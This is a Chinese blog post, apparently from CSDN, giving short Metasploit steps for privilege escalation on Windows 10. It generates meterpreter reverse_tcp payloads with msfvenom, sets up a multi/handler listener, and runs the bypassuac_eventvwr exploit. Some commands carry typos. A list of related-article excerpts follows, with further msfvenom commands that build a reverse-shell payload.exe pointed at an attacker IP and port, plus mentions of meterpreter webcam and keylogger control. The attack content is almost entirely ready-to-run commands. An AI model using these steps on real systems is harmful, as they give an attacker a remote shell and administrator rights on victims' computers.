渗透之——Metasploit Win10提权

最新推荐文章于 2024-08-10 06:01:36 发布
最新推荐文章于 2024-08-10 06:01:36 发布
阅读量1w 收藏 20
点赞数 1
分类专栏: 精通渗透系列 文章标签: Metasploit 渗透 提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l1028386804/article/details/86515785
版权

转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86515785

1.查看目标主机的操作系统

a) X86操作系统

kali# msfvnom –p payload/windows/meterpreter/reverse_tcp

b) X64操作系统

kali# msfvnom –p payload/windows/x64/meterpreter/reverse_tcp

2.使用msf建立会话

msf exploit(handler) > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

3.提权

msf exploit(handler) > search bypassuac //使用bypassuac(绕过用户帐户控制) 
msf exploit(handler) > set payload exploit/windows/local/bypassuac_eventvwr # 在x64使用成功 
msf exploit(handler) > set payload windows/x64/meterprese/reverse_tcp 
msf exploit(handler) > show targets //查看目标,可选项,根据操作系统选择 
msf exploit(handler) > set target 1 #设置目标为x64,0:x86 
msf exploit(handler) > exploit

 

 

冰 河
关注
专栏目录
提权学习之旅——利用Metasploit提权
Lemon's blog
08-16 717
1
msfvenom-shll生成工具是msf 组件——Metasploit(MSF)使用详解
代码审计
04-22 2512
抽离 专职生成对应的payload异或编码 -e x86/shikata_ga_nai -i 3linux 生成 payloadphp 生成 payloadpython 生成 payloadwindows 生产payload 抽离 专职生成对应的payload 异或 编码 免杀 msfvenom -l platforms 支持平台 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.226.142 lport=55212 -f
解决win10提权问题,一键提权,方便
07-26
希望能帮助大家,大家可以试试,我就是这么解决的,很方便
渗透之——Metasploit自定义让磁盘失效的后渗透模块
冰河的专栏
01-12 704
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86383118 一个可以禁用Windows 操作系统上的指定硬盘的程序,这里我们将脚本命名为:disable_drives_by_binghe.rb。 具体内容如下: ## # Author 冰河 # Date 2019-01-12 # Description 禁用Wind...
Metasploit Framework (MSF) 详解
最新发布
cxm4545的博客
08-10 1666
Metasploit Framework (简称MSF)是一款开源的渗透测试框架,它提供了数百个已知软件漏洞的专业级漏洞攻击工具和漏洞利用模块,为渗透测试,shellcode 编写和漏洞研究提供了一个可靠平台。Kali里自带了MSF工具,使用命令 msfconsole 或者 双击MSF图标 即可以启动MSF。本篇就以Kali为实验环境来学习MSF。
metasploit自动化渗透攻击模块
11-18
metasploit自动化渗透攻击模块db_autopwn
Windows 10 提权漏洞复现及武器化利用
andiao1218的博客
09-01 1421
项目地址:https://github.com/SandboxEscaper/randomrepo 相关工具的下载地址: Process Explorer:https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer CFF Explorer:https://ntcore.com/?page_id=...
Meterpreter提权那些事
蚁景网安学院
06-20 844
一引言Meterpreter提权我们经常会遇到,熟悉它掌握它对渗透测试至关重要。竟然无法逃避就得学会征服它,接下来我会带领征服Meterpreter。二准备实验环境1.Kali lin...
【MSF】Kali最强渗透工具之Metasploit
zou09241314的博客
10-23 1131
类似于msf有一个神奇的魔法,能让复杂的漏洞攻击的流程变得非常简单,一个电脑小白经过几小时的学习,就能对操作系统等主流漏洞发起危害性攻击。 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。
Web渗透测试实战:基于Metasploit 5.0
华章IT官方博客
03-28 4117
在当今快速发展的技术世界中,信息安全行业正以惊人的速度变化,与此同时,针对组织的网络攻击数量也在迅速增加。为了保护自己免受这些来自真实世界的攻击,许多组织在其流程管理中引入了安全审计以及风险和漏洞评估机制,旨在评估与其业务资产有关的风险。为了保护IT资产,许多组织聘请信息安全专业人员,以识别组织的应用程序和网络中可能存在的风险、漏洞和威胁。对于信息安全专业人员来说,掌握并...
Kali linux 学习笔记(九十六)metasploit framework——客户端渗透 2020.4.28
闵行小鱼塘
04-28 870
本节学习客户端渗透
Kali使用Metapsloit渗透win10 生成 payload 反弹shell
weixin_45908624的博客
07-19 2422
windows payload 反弹shell
meterpreter常用命令
m0_52421380的博客
08-12 2701
MeterpreterMetasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。Meterpreter功能强大,支持信息收集、提权、注册表操作、哈希利用、截屏录屏等操作,也支持对摄像头、录音设备、键盘鼠标的控制。可以使用meterpreter自带的功能实现控制对方手机和电脑。nc,全称为NetworkConnection,是一种网络连接的工具,可以用来在两台计算机之间建立网络连接。
2021-05-07 使用metasploit(MSF) 和 木马 入侵win10 虚拟机
White_give_boy的博客
05-07 1460
使用metasploit(MSF) 和 木马 入侵win10 0x01 实验环境 攻击机:kali linux ip:192.168.171.128 目标机:windows 10 家庭普通版 ip:物理主机 0x02配置msf 1.开启数据库服务 service postgresql start 2.初始化数据库 msfdb init 3.进入msf 4. 加载模块,显示参数 5. 修改参数 LHOST为攻击机ip,LPORT为监听端口 6.开始监...
用kali的Meterpreter控制win10,可以偷看你的电脑的所有数据
微信号:RunsenLiu
10-20 5542
MeterpreterMetasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、...
【kail】使用Metasploit 渗透Windows10
爪白白的个人博客
12-14 6983
一、在Kali Linux中生成被控端(msfvenom命令) 第一步:下面我们用msfvenom命令使用反向远程控制程序“windows/meterpreter/reverse_tcp”。该软件执行时自动连接IP“192.168.43.77”,连接的端口为“5000”,生成的文件为payload.exe,在/root目录下 msfvenom -p windows/meterpreter/re...
使用metasploit(MSF)对windows的ms08-067漏洞进行利用的过程
D-river博客
10-11 9758
metasploit比较经典的使用实例,ms08-067 netapi
记一次msf渗透win10
m0_46373658的博客
11-06 2472
KALI IP 192.168.186.141 WIN 10 192.168.186.131 生成木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.106 LPORT=1234 -f exe -o payload.exe LHOST 本地的IP地址 LPORT 反向连接到主机的端口 打开 msfconsole use exploit/multi/handler 设置模块 set payload windows/meterp
实战:入侵win10
热门推荐
zhaoyuhan1124的博客
08-29 1万+
简介 网上看到有人发布的关于win10的入侵流程,正好手上有两台电脑,大致说一下我的思路吧 原理 原理其实都是差不多的,即想办法把你的后门植入系统,然后远程控制。随着win10越来越安全,如果对方防备完善的话, 防火墙全开,远程端口默认禁止,附带杀毒软件,那么很难不通过物理接触感染系统。这里的思路利用win10的secure boot 提权然后拿到Administrator帐号进行入侵 步骤 简要...
Metasploit针对win10相关渗透模块
04-22
的使用方法和注意事项是什么? Metasploit是一款流行的渗透测试框架,也可以用于渗透测试和漏洞利用。针对Win10渗透模块包括许多模块,例如ms16-014的模块。使用这些模块时需要注意以下几点: 1.首先,必须保证Metasploit框架本身是最新的版本,因为旧版本可能包含已知的漏洞,可能会被黑客攻击。 2.其次,必须具备足够的渗透测试知识和技能,以便能够成功使用这些模块。 3.还需要准备好一份可供攻击的目标主机,例如虚拟机或实际计算机,并在目标主机上安装一个特定的漏洞补丁,然后使用Metasploit中的渗透模块来测试漏洞。 总之,Metasploit框架提供了一种强大的工具来测试和利用各种漏洞,但是必须谨慎使用,遵守法律和道德义务。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

冰 河

可以吃鸡腿么?

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值